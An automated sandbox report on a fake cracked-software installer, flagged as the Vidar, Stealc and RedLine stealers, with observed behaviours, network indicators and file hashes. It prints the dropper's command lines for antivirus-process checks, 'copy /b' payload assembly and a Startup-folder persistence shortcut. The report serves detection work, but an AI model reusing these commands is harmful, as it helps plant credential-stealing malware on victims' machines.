Analysis Overview
Threat Level: Known bad
The file https://download.tt2dd.com/ was found to be: Known bad.
Malicious Activity Summary
Detect Vidar Stealer
Stealc
Vidar
RedLine
Suspicious use of NtCreateUserProcessOtherParentProcess
RedLine payload
Reads user/profile data of web browsers
Executes dropped EXE
Drops startup file
Loads dropped DLL
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks whether UAC is enabled
Checks installed software on the system
Program crash
Enumerates physical storage devices
Uses Volume Shadow Copy WMI provider
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Enumerates processes with tasklist
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Modifies system certificate store
Suspicious use of SendNotifyMessage
Runs ping.exe
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Uses Volume Shadow Copy service COM API
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-09 13:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-09 13:02
Reported
2024-05-09 13:05
Platform
win10-20240404-ja
Max time kernel
150s
Max time network
152s
Command Line
Signatures
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Stealc
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4536 created 3284 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\Announcement.pif | C:\Windows\Explorer.EXE |
| PID 4536 created 3284 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\Announcement.pif | C:\Windows\Explorer.EXE |
Vidar
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133597333775792595" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://download.tt2dd.com/
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffad1ec9758,0x7ffad1ec9768,0x7ffad1ec9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1852 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2184 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4708 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 --field-trial-handle=2028,i,14308236352989155344,7496445338927113435,131072 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\" -spe -an -ai#7zMap24869:146:7zEvent13736
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\" -spe -an -ai#7zMap2856:228:7zEvent6800
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Crack.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Broken Broken.cmd & Broken.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 1151
C:\Windows\SysWOW64\findstr.exe
findstr /V "BluesAlgeriaDefinedIntersection" Pressed
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Breakfast + Dinner + Steven 1151\Q
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\1151\Equivalent.pif
1151\Equivalent.pif 1151\Q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe
"C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\Setup.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Reprint Reprint.cmd & Reprint.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 55205415
C:\Windows\SysWOW64\findstr.exe
findstr /V "pastinvitationinformalimproving" Does
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Bikini + Relief + Fw + Maximize + Bases 55205415\q
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\Announcement.pif
55205415\Announcement.pif 55205415\q
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & echo URL="C:\Users\Admin\AppData\Local\CyberSphere Dynamics\LynxChat.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LynxChat.url" & exit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55205415\RegAsm.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 2364
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3700 -s 2356
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | download.tt2dd.com | udp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | tcp |
| US | 108.178.44.242:443 | download.tt2dd.com | udp |
| US | 8.8.8.8:53 | 242.44.178.108.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | dhiqaragency.com | udp |
| US | 172.67.215.245:443 | dhiqaragency.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 2.18.190.80:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 245.215.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | BDMkHBPzrNwUIRfHIVtQKUDid.BDMkHBPzrNwUIRfHIVtQKUDid | udp |
| US | 8.8.8.8:53 | KUZLiTEaapNEWFMhPiGnHQGgq.KUZLiTEaapNEWFMhPiGnHQGgq | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| BE | 104.68.92.92:443 | steamcommunity.com | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| US | 8.8.8.8:53 | 92.92.68.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.242.109.65.in-addr.arpa | udp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| FI | 65.109.242.112:443 | 65.109.242.112 | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.14.97.104.in-addr.arpa | udp |
| UA | 45.89.53.206:4663 | tcp | |
| US | 8.8.8.8:53 | 206.53.89.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
Files
\??\pipe\crashpad_200_PDFQZEAWMMWOXPDR
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\4ae54ba8-a068-4e20-a966-2382f3891bb1.tmp
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar.gz.crdownload
| MD5 | 712e95f9d0c5c7359aeaab697e099f9e |
| SHA1 | 9ff66a4d79e060d764093b70fe68949b62edf439 |
| SHA256 | d954514846c34e32e4cc7a29b840e4842a9dc7146c7daeb8ed454e301f52f7bf |
| SHA512 | 7582f4d0a001df350a0ae4da5e189388017c63345dc06e3c2656baa3e931688b4e8c0c127b107730f71dc3723e10ebf67fd1de17edac6fd29f15f23fed296b9f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 69043e67c80d4dc6bc7ef3a46681d510 |
| SHA1 | 19db0ae4d4ad8613aed5626542a9c689a894d482 |
| SHA256 | 09d22baa9b45f6c0caa352c135858078ea28c30e2cd712312e3d39669e74ab99 |
| SHA512 | 7cbed596650d02c4545b49530cfd1b5471ff4a196b9829a83e17757f92ab055375fccd6e618b28122075eae7e81aef2f49b15e9021fdef2d0defbcea36e91ee5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d0fce1ca8a86aafef0f7bc63ccaa15ca |
| SHA1 | fea36e6c7a549f5a4c419c108aba4665125d8eea |
| SHA256 | eda5888c73f4ce760b0a68c4201f2c42fae043c028553ebc06e44c858b601ad0 |
| SHA512 | 3c26d352c183b490f44da63ce8f38a5476adde6e14248ec0d4cf5ca3aa3d863818517460fa2d8877a2c455292a7d899455be467bb704ba6e8d7c7270579f1dc3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 3b900c2238604cb9a65435a0a53a9432 |
| SHA1 | b3d443f24cef15f5d848c4083301e2967bdcf023 |
| SHA256 | 81d28f3a94f0b372836dec666533eab552d01b1d9eef3d8f5334f8a6352e5ac2 |
| SHA512 | 3c082d4e2b99e6bb137e0115224893a4f3f6ff84a953fc209fb892f0aaef8d0ac4903d2dafcf0f32073450881dda4e4f72ba2e59178dc5bc1a9673c49cb1c117 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 8932303bef4fed628f19f766246fdd31 |
| SHA1 | 9ea4591ed68cb3234622d4ad3a4f55c857cebad9 |
| SHA256 | 4e7bcfe97b556a17e8ac240de71db7e259696d1100b8b4ee182b0c08c6701bdc |
| SHA512 | 3a78b1b9155c1b4b98d5b0b60193e114578830dd0727342919cb7a9d53805fc1f9a232c8677921f3c3d62bb7b615090cb8b96e431c757ebafc787661e736fcb6 |
C:\Users\Admin\Downloads\Manual-Installer-V4.98767625T76545R980G.tar\Manual-Installer-V4.98767625T76545R980G\bin\Debug\MusicPlayerApp.vshost.exe.config
| MD5 | 28960c034283c54b6f70673f77fd07fa |
| SHA1 | 914b9e3f9557072ea35ec5725d046b825ef8b918 |
| SHA256 | 8d65429e0b2a82c11d3edc4ea04ed200aedfea1d7ef8b984e88a8e97cff54770 |
| SHA512 | d30dd93457a306d737aac32c0944880517ed4c3e8f2d1650ffca6c1d98e892082b41b40fb89ccf75d5f03d2464b0b4f943cd4b082071f0abfe978d149bd61479 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Broken
| MD5 | dbf242470b8793fbb15f2262de428dfe |
| SHA1 | 5a5694c41907a53ac44c0ab164c104a9c3377667 |
| SHA256 | 66f1be1ca30374f5c9301d0f4528eff366bfb44d67c65e1321b066a3e6d1b9fe |
| SHA512 | 1059e358d3e513ee0a8ef2e8aae88a900890c65550bd6eff8cb50e02fbbb7dcedc5d0cf61e4dfbd196436f2b41c99fe5fb08afd8db595adc54e4b98659280f76 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Pressed
| MD5 | cf5f76bcd29588fb5fbebd249283460c |
| SHA1 | 1a1f6a7b4a39acb640a016b5d52c672762de44d9 |
| SHA256 | dff0f7ea17f596008bff24de1c9231ac973091087ac3b305fb7b09b64e917b80 |
| SHA512 | 2cc82370ef83fbecaa68d418f12c6fbe5cbcd99d6c55f49ad2e5aa00e51617a1edb4ba4ad36bf4dd195af57b54f1ff5cdefc3ddb72d7b14b047350fd6c886330 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Pension
| MD5 | fde08f709e056568f8556560990f5b4f |
| SHA1 | db297a5b34deb093a0fb70e8bfb098e4999bb4aa |
| SHA256 | 260a009cd47d7c01df3bf879f374a2b1b97cb809fdb73d2f9253c5fe3eea86ac |
| SHA512 | 41373bca6518602d3136fdf42798a7469510ee1450664dfd1c85dffd638d3b3623ad7bbd3d24afae217bb5ab537cbde79e5870b741c507759affbf2c36adf865 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Crazy
| MD5 | f2a40b7cd21b530472bb2e8b0d89136b |
| SHA1 | 2e45167924bb3c1ca5307feef80fc43a4a5e7af8 |
| SHA256 | dcd6a0df13bdb3adcc2aebb1352ed61c82f0f6f1bca2d19e70cc0f5d595c8e92 |
| SHA512 | 663affc416f064c9e94f501d406f264246f818e1c57dbd4f6a6f9ec34de8c3da0229bad3a9e60837e5e722b08119535b1a8f0a39ed16a2b9e8d8ae382bc7f684 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Seasons
| MD5 | 00f36700d9d99547a524d6c485f81b97 |
| SHA1 | 4ad7129284149769bccd1105f77a0a30e600c4b7 |
| SHA256 | 3fe028c9d835683031c15ece07aad46205113fb404f061e41117cb2cba195f8e |
| SHA512 | 56bcaa17dbe4281e65ecb50ff7755d5b62b86e733477e77962cf5147abffb108328a252291eb369b7429eda31d901d5e087dd1e0d5ebac3fb4ee9f29267a0688 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Password
| MD5 | 642cc3cad7579882540d6e71b00d5e91 |
| SHA1 | fcfb810fa0f5983b781582afdd1a2b65c3310bc2 |
| SHA256 | d874480ed8bf8e2dbb3057848eb2a3cf94a64e1e61f8897001a3e05b63e3f29d |
| SHA512 | b7afb9423475687f42c2dc084647e16d1054badbdf0f2c79952bb5b9e9c436fab48ceaa731a9630557621f3c3b785c64d49f3ad62a8e4af129d25bc4927f45d6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Storage
| MD5 | b93b13b168b93143ab66f60fc81d1fca |
| SHA1 | 7d342b47bd372aaf1991607d66d552c813c5de8f |
| SHA256 | 931c7ba52717cecf461dfa66a44d73f053befe71bc8432893ca0428c2f1d8045 |
| SHA512 | 27d3cb138365c8a7bb4fdda89294541a311a40917b23ec5abdd3b61ceebe35ead8ae1b78d8283fe7f34220deecb7b9deb3c90920ee5b1eca3d4b59606dca7064 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Answering
| MD5 | c5f9f475de7e9ee88385c0167faba246 |
| SHA1 | c15f28af857b44f21bfb9cf30f0045fe133fed6f |
| SHA256 | f90752a63f2f936057456e210a3aa7cfc9c616c527dfc7722ab975eed47d532c |
| SHA512 | 498660418e16797084ac2376ebaf35f30daaa62fbf9c767d7dd8bd5ff0d8a1590d7a94d9dc3054932a02b5283109801d7855d65d41a3f95252363de225c00cc9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Ta
| MD5 | f60f406fd3dfca1f0ae0fe0113dec01a |
| SHA1 | 23d51e53c09b720aa25125f195501c1e0402378b |
| SHA256 | 3c184485b23e0d19b39aeae57e95cb772fae39c03b0838605f9acc3ae23d50c9 |
| SHA512 | 72d62af40e6432380aa52b752ebd8770c70586d477c00996cda0ba30ddf78d6303d6dcfdadf1a3fb1ad965f0dda43ef7ee7397e32200d2717795e6a946230327 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Joins
| MD5 | 188ce596579c2d930d187d97ae19a767 |
| SHA1 | 971c6af9d0e20e1b1974edad01f7715df97e089f |
| SHA256 | 8b8de4c9a3d09d9841fa94453ed482ecd6c07669b0c8dee18c623b9a4eae9721 |
| SHA512 | b72b038d4d6c6690864a5b28db593e854116fcd772e71b97fb8a691dde954113a2893b9d67e14c1ee94aaa6ec4c6e65cec7864ce1587012d1bc3daeac9b7680d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Exercises
| MD5 | 4ae9a830a28df6ceef564e032d7c14a6 |
| SHA1 | dd1a92d2df6b939de3e740da26e58681c87ccdfe |
| SHA256 | 5bee23acc72504a2789cf9e21bafbf2fc098f612c174b891bdd377712d1283df |
| SHA512 | 7ac0f03bf67b7be669534909e90a2fb7dbfb35bf97e1b6c73538b5b1c731614b5f474355b9577dc669a728c682ad367956ca1d7e204e9f37b6b9abc353db06d5 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Vibrator
| MD5 | f3491fd23f5eeab678812b758b29ffdd |
| SHA1 | 4d724ffc50c0139276f2e3fd561a0bb10c697fe7 |
| SHA256 | 0e0137af0f7b35ad1320a820e1e7b5e309bbcd64479359673a779a8c1f8eadfa |
| SHA512 | ea5b47524d009c0abdcbf7890c09c5fa14683e23651d028c520a0cc69aadc34b1a07700996920b5aff02c9e43f121ab335267173d65c318d47a15f71aa08089b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Valid
| MD5 | a4002638cda7bee85d3575c70621675e |
| SHA1 | dceae6f7f26b99b57baccafea26709946b7b92a3 |
| SHA256 | e556f7586176e36b130543596b42713226b72b2f3370457a00245c04e941a41a |
| SHA512 | 40882a32315426494a08b4ce9c3db7a78225ed1c6839d6fc7a09e8c0a818a83f886a31d010f1faae1a530ef54316076246df829751676c0c60e190347e468477 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Vast
| MD5 | 13c74e23fa0e28b74c466278c7972b76 |
| SHA1 | b88d78a8f56cf98d5fd8cc335c504b421da9e8e2 |
| SHA256 | ae188f80af16256ae9a72eb8194c8ba3d47c81dc2ba3595dd4c03bd6a2c4d45b |
| SHA512 | 818e852759fc43084a6c1f18f685a91b16bb1366137fd8d2ec8864786af59ba41a40adfae53092430fb2f62271aab8e2b971a4d3a873dadb7fdfbc917cc6b70a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Blocked
| MD5 | d8aef80768ee56bcfa76caa5fe15e014 |
